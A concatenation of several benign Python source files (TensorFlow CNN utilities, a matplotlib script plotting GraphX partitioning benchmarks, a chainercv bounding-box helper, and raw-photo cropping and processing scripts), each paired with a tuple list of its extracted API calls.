'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((14022, 14098), 'ue4nlp.dropconnect_mc.activate_mc_dropconnect', 'activate_mc_dropconnect', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14045, 14098), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((14170, 14242), 'ue4nlp.dropout_mc.activate_mc_dropout', 'activate_mc_dropout', (['model'], {'activate': '(True)', 'random': 'ue_args.inference_prob'}), '(model, activate=True, random=ue_args.inference_prob)\n', (14189, 14242), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((1198, 1293), 'ue4nlp.dropconnect_mc.LinearDropConnectMC', 'LinearDropConnectMC', ([], {'linear': 'linear', 'p_dropconnect': 'ue_args.inference_prob', 'activate': 'activate'}), '(linear=linear, p_dropconnect=ue_args.inference_prob,\n activate=activate)\n', (1217, 1293), False, 'from ue4nlp.dropconnect_mc import LinearDropConnectMC, activate_mc_dropconnect, convert_to_mc_dropconnect, hide_dropout\n'), ((4109, 4148), 'utils.utils_heads.XLNetClassificationHeadIdentityPooler', 'XLNetClassificationHeadIdentityPooler', ([], {}), '()\n', (4146, 4148), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((4194, 4248), 'utils.utils_heads.BertClassificationHeadIdentityPooler', 'BertClassificationHeadIdentityPooler', (['model.classifier'], {}), '(model.classifier)\n', (4230, 4248), False, 'from utils.utils_heads import ElectraClassificationHeadIdentityPooler, BertClassificationHeadIdentityPooler, ElectraNERHeadIdentityPooler, XLNetClassificationHeadIdentityPooler\n'), ((5444, 5493), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (5454, 5493), True, 'import numpy as np\n'), ((12061, 12103), 'numpy.min', 'np.min', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12067, 12103), True, 'import numpy as np\n'), ((12609, 12658), 'numpy.asarray', 'np.asarray', (["eval_results['sampled_probabilities']"], {}), "(eval_results['sampled_probabilities'])\n", (12619, 12658), True, 'import numpy as np\n'), ((2014, 2069), 'ue4nlp.dropout_mc.convert_to_mc_dropout', 'convert_to_mc_dropout', (['model', "{'Dropout': dropout_ctor}"], {}), "(model, {'Dropout': dropout_ctor})\n", (2035, 2069), False, 'from ue4nlp.dropout_mc import DropoutMC, activate_mc_dropout, convert_to_mc_dropout\n'), ((5143, 5188), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (5152, 5188), True, 'import numpy as np\n'), ((12263, 12308), 'numpy.argmin', 'np.argmin', (['full_mahalanobis_distance'], {'axis': '(-1)'}), '(full_mahalanobis_distance, axis=-1)\n', (12272, 12308), True, 'import numpy as np\n')]
|
import os
import errno
import numpy as np
import tensorflow as tf
def create_path(path):
"""Create path if not exist"""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def conv_layer(name, input_tensor, ksize, num_out_channels, keep_prob, random_state,
max_pool=False):
input_channels = input_tensor.shape.as_list()[-1]
conv_filter = tf.get_variable(
'{}_filter'.format(name), [ksize[0], ksize[0], input_channels, num_out_channels],
tf.float32, tf.truncated_normal_initializer)
conv = tf.nn.conv2d(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name)
conv_relu = tf.nn.relu(conv, '{}_relu'.format(name))
if max_pool:
conv_maxpool = tf.nn.max_pool(
conv_relu, [1, 2, 2, 1], [1, 2, 2, 1], 'SAME', name='{}_maxpool'.format(name))
conv_dropout = tf.nn.dropout(conv_maxpool, keep_prob, seed=random_state, name='{}_dropout'.format(name))
return conv_dropout
conv_dropout = tf.nn.dropout(conv_relu, keep_prob, seed=random_state, name='{}_dropout'.format(name))
return conv_dropout
def train_val_split(train_mtx, label_arr, random_state, train_proportion=0.8):
np.random.seed(random_state)
num_train_rows = np.round(train_mtx.shape[0] * train_proportion).astype(int)
rows_selected = np.random.choice(train_mtx.shape[0],
num_train_rows, replace=False)
rows_not_selected = list(
set(range(train_mtx.shape[0])) - set(rows_selected))
return (train_mtx[rows_selected], train_mtx[rows_not_selected],
label_arr[rows_selected], label_arr[rows_not_selected])
class Dataset():
def __init__(self, X, y):
self.X = X.copy()
self.y = y.copy()
class BatchManager():
def __init__(self, train_set, num_epochs, shuffle, random_state):
"""
train_set, val_set: RNNDataset instances
"""
self.train_set = train_set
self.num_epochs = num_epochs
self.shuffle = shuffle
self.random_state = random_state
self.current_epoch = 0
self.rows_in_batch = []
def next_batch(self, batch_size):
"""
Output next batch as (X, y), return None if ran over num_epochs
"""
num_rows = self.train_set.X.shape[0]
while len(self.rows_in_batch) < batch_size:
self.current_epoch += 1
row_nums = list(range(num_rows))
if self.shuffle:
np.random.seed(self.random_state)
np.random.shuffle(row_nums)
self.rows_in_batch += row_nums
selected_X = self.train_set.X[self.rows_in_batch[:batch_size]]
selected_y = self.train_set.y[self.rows_in_batch[:batch_size]]
self.rows_in_batch = self.rows_in_batch[batch_size:]
if self.current_epoch > self.num_epochs:
return None
return selected_X, selected_y
|
[
"numpy.random.seed",
"os.makedirs",
"tensorflow.nn.conv2d",
"numpy.random.choice",
"numpy.round",
"numpy.random.shuffle"
] |
[((616, 688), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['input_tensor', 'conv_filter', '[1, 1, 1, 1]', '"""SAME"""'], {'name': 'name'}), "(input_tensor, conv_filter, [1, 1, 1, 1], 'SAME', name=name)\n", (628, 688), True, 'import tensorflow as tf\n'), ((1251, 1279), 'numpy.random.seed', 'np.random.seed', (['random_state'], {}), '(random_state)\n', (1265, 1279), True, 'import numpy as np\n'), ((1381, 1448), 'numpy.random.choice', 'np.random.choice', (['train_mtx.shape[0]', 'num_train_rows'], {'replace': '(False)'}), '(train_mtx.shape[0], num_train_rows, replace=False)\n', (1397, 1448), True, 'import numpy as np\n'), ((142, 159), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (153, 159), False, 'import os\n'), ((1301, 1348), 'numpy.round', 'np.round', (['(train_mtx.shape[0] * train_proportion)'], {}), '(train_mtx.shape[0] * train_proportion)\n', (1309, 1348), True, 'import numpy as np\n'), ((2549, 2582), 'numpy.random.seed', 'np.random.seed', (['self.random_state'], {}), '(self.random_state)\n', (2563, 2582), True, 'import numpy as np\n'), ((2599, 2626), 'numpy.random.shuffle', 'np.random.shuffle', (['row_nums'], {}), '(row_nums)\n', (2616, 2626), True, 'import numpy as np\n')]
|
#! /usr/bin/env python
#################################################################################
# File Name : IPADS_GraphX_Plot_Partition_2.py
# Created By : xd
# Creation Date : [2014-08-14 22:09]
# Last Modified : [2014-08-14 22:11]
# Description : new partition plot to concern only about data
#################################################################################
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
def IPADS_GraphX_Plot(
data, ngroup, label, filename, xlabel, ylabel, title, xticks, legendPos, legendNcol
):
plt.clf() # Clear figure
N = ngroup
step = len(data) / N
ind = np.arange(N) # the x locations for the groups
width = 0.1 # the width of the bars: can also be len(x) sequence
for i in range(0, step):
if i<len(label):
plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1)), label=label[i])
else:
plt.bar(ind+i*width, data[i::step], width, color=cm.Paired(1.0/(i+1)))
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.title(title)
plt.xticks(ind + 2 * width, xticks)
plt.legend(loc=legendPos, ncol=legendNcol)
# plt.show()
plt.savefig(filename)
filename = "9.png"
data = [146559,
101280,
93529,
139790,
132659,
139120,
108985,
133896,
154567,
153680,
182312,
232833,
192383,
194857,
280573,
417558,
361235,
308501]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = 'Execution Time (second)'
ylabel = 'Number of Partitions'
title = 'Execution Time (in-2.0-1m V1000000 E8179662)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 2
ngroup = 3
# convert unit
data = map(lambda x: x/1000.0, data)
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
filename = "10.png"
data = [4.21914028911,
3.7368692711,
4.85803910642,
3.75580013086,
6.10288873181,
5.54774338168,
4.645440915,
4.17718818837,
4.31699997602,
5.38391002532,
7.15146857475,
6.36269531228,
5.12988273555,
4.75113421863,
5.18381478864,
5.9121127584,
8.46766006671,
7.35200459511]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (web-google-single V875713 E5105039)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
filename = "11.png"
data = [103, 105, 23, 23, 23, 22, 104, 105, 22, 21, 22, 22, 103, 103, 23, 22, 23, 22]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xlabel = '# of Partitions'
ylabel = 'Ingress Time (ms)'
title = 'Ingress Time by # of Partitions (web-google-single V875713 E5105039)'
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (web-google-single V875713 E5105039)'
filename = "12.png"
data = [1488.6714085, 753.544123521, 4227.30253826, 30134.8904464, 512.89786005, 642.786800653, 1243.13596746, 728.884052233, 19262.1185923, 5564.88385503, 436.401272225, 475.143767717, 1009.6037415, 573.291372919, 10666.0414354, 3999.63980127, 458.58901959, 422.537800331]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (web-google-single V875713 E5105039)'
filename = "13.png"
data = [2325.52199701, 1320.9993598, 7603.45404626, 2690.44774314, 607.542536448, 883.859326247, 1811.85158509, 1414.91908122, 3366.48905633, 7993.1149977, 484.047194393, 511.027285377, 1335.58608373, 828.842050936, 15417.097578, 4812.01482182, 350.905108825, 377.629861195]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
# xlabel = '# of Partitions'
# ylabel = '(max-min)/avg of vertices'
# title = '(max-min)/avg of vertices by # of Partitions (web-google-single V875713 E5105039)'
#
# xlabel = '# of Partitions'
# ylabel = '(max-min)/avg of edges'
# title = '(max-min)/avg of edges by # of Partitions (web-google-single V875713 E5105039)'
#
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
xlabel = '# of Partitions'
ylabel = 'Replication Factor'
title = 'Replication Factor by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "14.png"
data = [5.83256150348, 5.00636483715, 4.45356055641, 6.24904844096, 7.71010450388, 6.37401659512, 6.98455246968, 6.06394728411, 5.29022081368, 7.61019549791, 9.8903190897, 7.86495092078, 8.60331885804, 7.72158282983, 6.72133033224, 9.57859781734, 13.4800690903, 10.1176783177]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of vertices'
title = 'stdev of vertices by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "15.png"
data = [1811.74003033, 1081.50691854, 290124.794151, 2445.98116497, 736.076632283, 731.045901004, 1711.13733125, 1208.98552514, 197679.735597, 3380.31018837, 924.754561167, 1134.14999784, 2296.44804677, 1286.57201168, 96026.7101455, 4257.20150275, 809.257504342, 778.212022131]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
xlabel = '# of Partitions'
ylabel = 'stdev of edges'
title = 'stdev of edges by # of Partitions (soc-LiveJournal1 V4847571 E68993773)'
filename = "16.png"
data = [9023.28625847,
9919.2555556,
19606.060674,
15191.7761438,
2424.12069674,
3144.04383754,
8524.25111277,
9485.00318575,
16107.8162292,
16489.4759357,
1886.11609229,
2797.04864341,
6773.90225036,
6602.12176671,
209703.384542,
12262.679599,
1090.59982998,
1621.1235011]
label = ["Hybrid(100)", "Hybrid(30)", "Edge2D", "Edge1D", "Random", "CanonicalRandom"]
xticks = ('16', '25', '48')
legendPos = "upper left"
legendNcol = 3
ngroup = 3
IPADS_GraphX_Plot(
data = data,
ngroup = ngroup,
label = label,
filename = filename,
xlabel = xlabel,
ylabel = ylabel,
title = title,
xticks = xticks,
legendPos = legendPos,
legendNcol = legendNcol,
)
|
[
"matplotlib.pyplot.title",
"matplotlib.cm.Paired",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.legend",
"numpy.arange",
"matplotlib.pyplot.xticks",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((693, 702), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (700, 702), True, 'import matplotlib.pyplot as plt\n'), ((768, 780), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (777, 780), True, 'import numpy as np\n'), ((1147, 1165), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (1157, 1165), True, 'import matplotlib.pyplot as plt\n'), ((1170, 1188), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (1180, 1188), True, 'import matplotlib.pyplot as plt\n'), ((1193, 1209), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (1202, 1209), True, 'import matplotlib.pyplot as plt\n'), ((1214, 1249), 'matplotlib.pyplot.xticks', 'plt.xticks', (['(ind + 2 * width)', 'xticks'], {}), '(ind + 2 * width, xticks)\n', (1224, 1249), True, 'import matplotlib.pyplot as plt\n'), ((1254, 1296), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'legendPos', 'ncol': 'legendNcol'}), '(loc=legendPos, ncol=legendNcol)\n', (1264, 1296), True, 'import matplotlib.pyplot as plt\n'), ((1319, 1340), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {}), '(filename)\n', (1330, 1340), True, 'import matplotlib.pyplot as plt\n'), ((1007, 1031), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1016, 1031), True, 'import matplotlib.cm as cm\n'), ((1120, 1144), 'matplotlib.cm.Paired', 'cm.Paired', (['(1.0 / (i + 1))'], {}), '(1.0 / (i + 1))\n', (1129, 1144), True, 'import matplotlib.cm as cm\n')]
|
# -*- coding: utf-8 -*-
import numpy as np
from chainercv.visualizations import vis_bbox as chainer_vis_bbox
def vis_bbox(img, bbox, label=None, score=None, label_names=None, ax=None):
"""A wrapper of chainer function for visualizing bbox inside image.
Args:
img (~torch.tensor):
an image which shape :math:`(3, H, W)` and format RGB [0.0, 1.0]
bbox (~torch.tensor):
bounding boxes we want to show.
Its shape is :math:`(N, 4)` and format is :math:`(x_\\mathrm{min}, y_\\mathrm{min}, \
x_\\mathrm{max}, y_\\mathrm{max})`
label (~torch.tensor):
labels of each bbox
score (~torch.tensor):
scores of each bbox
label_names (iterable of strings):
Name of labels ordered according to label ids.
If this is `None`, labels will be skipped.
"""
return chainer_vis_bbox(np.uint8(img * 255), bbox[:, [1, 0, 3, 2]],
label=label, score=score,
label_names=label_names, ax=ax)
|
[
"numpy.uint8"
] |
[((915, 934), 'numpy.uint8', 'np.uint8', (['(img * 255)'], {}), '(img * 255)\n', (923, 934), True, 'import numpy as np\n')]
|
import os
import os.path as osp
import yaml
from operator import concat, sub
from utils.raw_utils import convert,scale,diff
from utils.io import imread, imwrite,get_exif,get_trip,raw2rgbg,mdwrite,raw_read_rgb,check_exif,extract_exif
from utils.isp import rgbg2linref, rgbg2srgb,rgbg2rgb
from utils.path import be,bj,mkdir
from multiprocessing import Pool, RawArray
import matplotlib.pyplot as plt
import os
import os.path as osp
import pandas as pd
import numpy as np
import exifread
import imageio
import rawpy
import cv2 as cv
from glob import glob
from glob import glob
from utils.io import parse_tripr
subdirs=['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917','nikon_20200616', 'nikon_20200617']
def get_trips():
for input_folder in subdirs:
df=parse_tripr(input_folder)
df.to_csv(osp.join(input_folder,'trip.csv'),index=False)
bsd=None
def get5rgb(inputs,outputs,black_level=256):
"""inputs: ref, ab, f
outputs: ref, ab, f, fo, tran"""
check_exif(inputs)
rgbs=[raw_read_rgb(x) for x in inputs]
h,w,c=rgbs[0].shape
for out,rgb in zip(outputs[:3],rgbs):
imwrite(out,rgb)
# return
raws=[rawpy.imread(x) for x in inputs[1:3]]
raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64)
- raws[0].raw_image_visible.astype(np.int64)
+ black_level,0).astype(np.uint16)
fo = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5)
imwrite(outputs[3],fo)
raws=[rawpy.imread(x) for x in inputs[:2]]
raws[1].raw_image_visible[:] = np.maximum(raws[1].raw_image_visible.astype(np.int64)
- raws[0].raw_image_visible.astype(np.int64)
+ black_level,0).astype(np.uint16)
tran = cv.resize(raws[1].postprocess(use_camera_wb=True,no_auto_bright=True),None,fx=0.5,fy=0.5)
imwrite(outputs[4],tran)
def batch5rgb(root:str,processes=16):
df=get_trip(root)
dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy()
out_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
# get5rgb(dfi[0],dfo[0])
# return
with Pool(16) as p:
ares = p.starmap_async(get5rgb, zip(dfi,dfo))
ares.wait()
def concat_bbs(root):
dfbd=pd.read_csv(osp.join(root,root+'.csv'))
dftrip=pd.read_csv(osp.join(root,'trip.csv'))
dfbb=pd.concat([dftrip,dfbd],axis=1)
dfbb.to_csv(osp.join(root,'bb.csv'),index=False)
from pprint import pformat
def exif_dbg():
path="nikon_20200616/raw/DSC_7550.NEF"
a=get_exif(path)
with open("exifnk.yaml",'w')as f:
f.write(pformat(a))
def tbnail_rgb(inputs,outputs):
r=1/16
for i,o in zip(inputs,outputs):
im=cv.imread(i)
if im is None:
print(i)
continue
# print(im.shape,im.dtype)
cv.imwrite(o,cv.resize(im,None,fx=r,fy=r))
def batch_rgbtb(root,fmt='rgbc'):
df=get_trip(root)
in_dirs=[osp.join(root,fmt,'origin'),osp.join(root,fmt,'derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.jpg'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,fmt,'thumbnail','origin'),osp.join(root,fmt,'thumbnail','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
with Pool(16) as p:
ares = p.starmap_async(tbnail_rgb, zip(dfi,dfo))
ares.wait()
def five(root,imformat='rgb'):
df=get_trip(root)
out_dirs=[osp.join(imformat,'thumbnail','origin'),osp.join(imformat,'thumbnail','derived')]
dfo=df.applymap(lambda x:f"})")
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:f"})")
mdwrite(osp.join(root,f'five{imformat}.md'),dfo)
def crop_rgb(inputs,outputs,bds):
w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]]
# print(h_start, w_start, h_end, w_end)
h_offset = (h_end-h_start)//32 * 32
w_offset = (w_end-w_start)//32 * 32
for i,o in zip(inputs,outputs):
img=cv.imread(i)
# img=cv.resize(img,None,fx=0.5,fy=0.5)
cv.imwrite(o,img[h_start:h_start+h_offset,w_start:w_start+w_offset])
def batch_crop_rgb(root):
df=get_trip(root)
in_dirs=[osp.join(root,'rgb','origin'),osp.join(root,'rgb','derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.jpg'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.jpg'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,'rgbc','origin'),osp.join(root,'rgbc','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy()
# print(dfi[50])
# crop_rgb(dfi[50],dfo[50],dfbd[50])
# return
with Pool(16) as p:
ares = p.starmap_async(crop_rgb, zip(dfi,dfo,dfbd))
ares.wait()
def tbnail_raw(inputs,outputs):
r=1/16
imgs=[cv.resize(rgbg2srgb(imread(x),maximum=65535),None,fx=r,fy=r) for x in inputs[:5]]
for img,o in zip(imgs,outputs[:5]):
imwrite(o,img)
def batch_rawtb(root):
df=get_trip(root)
in_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')]
dfi=df.applymap(lambda x:osp.join(in_dirs[0],x+'.png'))
dfi[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(in_dirs[1],x+'.png'))
dfi=dfi.to_numpy()
out_dirs=[osp.join(root,'rawc','thumbnail','origin'),osp.join(root,'rawc','thumbnail','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.jpg'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.jpg'))
dfo=dfo.to_numpy()
with Pool(16) as p:
ares = p.starmap_async(tbnail_raw, zip(dfi,dfo))
ares.wait()
def get5rawc(inputs,outputs,bds):
"""inputs: gt, ab, f
outputs: gt, ab, f, fo, m"""
raws=[imread(x) for x in inputs]
w_start, h_start,w_end, h_end =[int(x) for x in bds[:4]]
# print(h_start, w_start, h_end, w_end)
h_offset = (h_end-h_start)//32 * 32
w_offset = (w_end-w_start)//32 * 32
rawsc=[x[h_start:h_start+h_offset,w_start:w_start+w_offset] for x in raws]
for out,raw in zip(outputs[:3],rawsc):
imwrite(out,raw)
fo = np.maximum(rawsc[2].astype(np.int32)
- rawsc[1].astype(np.int32),0).astype(np.uint16)
imwrite(outputs[3],fo)
tran = np.maximum(rawsc[1].astype(np.int32)
- rawsc[0].astype(np.int32),0).astype(np.uint16)
imwrite(outputs[4],tran)
def batch5rawc(root:str,processes=16):
df=get_trip(root)
dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy()
out_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.png'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.png'))
dfo=dfo.to_numpy()
dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy()
# get5rawc(dfi[0],dfo[0],dfbd[0])
# return
with Pool(16) as p:
ares = p.starmap_async(get5rawc, zip(dfi,dfo,dfbd))
ares.wait()
def main3():
for subdir in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']:
batch5rawc(subdir)
batch_rawtb(subdir)
five(subdir,'rawc')
def main():
sizes=[]
for root in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']:
root=osp.join(root,'rgbc','origin')
ls=os.listdir(root)
for f in ls:
sizes.append(cv.imread(osp.join(root,f)).shape)
sizes=np.array(sizes)
# np.savez('size.npz',sizes)
print(np.histogram(sizes[:,0]))
print(np.histogram(sizes[:,1]))
def main2():
for subdir in ['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917']:
# for subdir in ['huawei_20200917']:
# batch5rgb(subdir)
# batch_crop_rgb(subdir)
# batch_rgbtb(subdir)
# five(subdir,'rgbc')
# concat_bbs(subdir)
print(subdir)
df=get_trip(subdir)
print(len(df))
if __name__ == '__main__':
main2()
# dfi=["huawei_20200917/raw/IMG_20200917_153703.dng",
# "huawei_20200917/raw/IMG_20200917_153710.dng",
# "huawei_20200917/raw/IMG_20200917_153724.dng"]
# dfo=["huawei_20200917/rgb/origin/IMG_20200917_153703.jpg",
# "huawei_20200917/rgb/origin/IMG_20200917_153710.jpg",
# "huawei_20200917/rgb/origin/IMG_20200917_153724.jpg",
# "huawei_20200917/rgb/derived/IMG_20200917_153724.jpg",
# "huawei_20200917/rgb/derived/IMG_20200917_153710.jpg"]
# get5rgb(dfi,dfo)
# a=rawpy.imread("huawei_20200917/raw/IMG_20200917_153703.dng").raw_image_visible.shape
# a=imread("huawei_20200917/raw/IMG_20200917_153703.dng").shape
# print(a)
|
[
"pprint.pformat",
"numpy.histogram",
"utils.io.imwrite",
"os.path.join",
"utils.io.raw_read_rgb",
"utils.io.imread",
"cv2.imwrite",
"utils.io.check_exif",
"utils.path.mkdir",
"rawpy.imread",
"pandas.concat",
"cv2.resize",
"utils.io.get_exif",
"multiprocessing.Pool",
"utils.io.parse_tripr",
"os.listdir",
"cv2.imread",
"numpy.array",
"utils.io.get_trip"
] |
[((1023, 1041), 'utils.io.check_exif', 'check_exif', (['inputs'], {}), '(inputs)\n', (1033, 1041), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1597, 1620), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (1604, 1620), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2024, 2049), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (2031, 2049), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2095, 2109), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (2103, 2109), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2752, 2785), 'pandas.concat', 'pd.concat', (['[dftrip, dfbd]'], {'axis': '(1)'}), '([dftrip, dfbd], axis=1)\n', (2761, 2785), True, 'import pandas as pd\n'), ((2930, 2944), 'utils.io.get_exif', 'get_exif', (['path'], {}), '(path)\n', (2938, 2944), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((3308, 3322), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (3316, 3322), False, 'from utils.io import imread, imwrite, 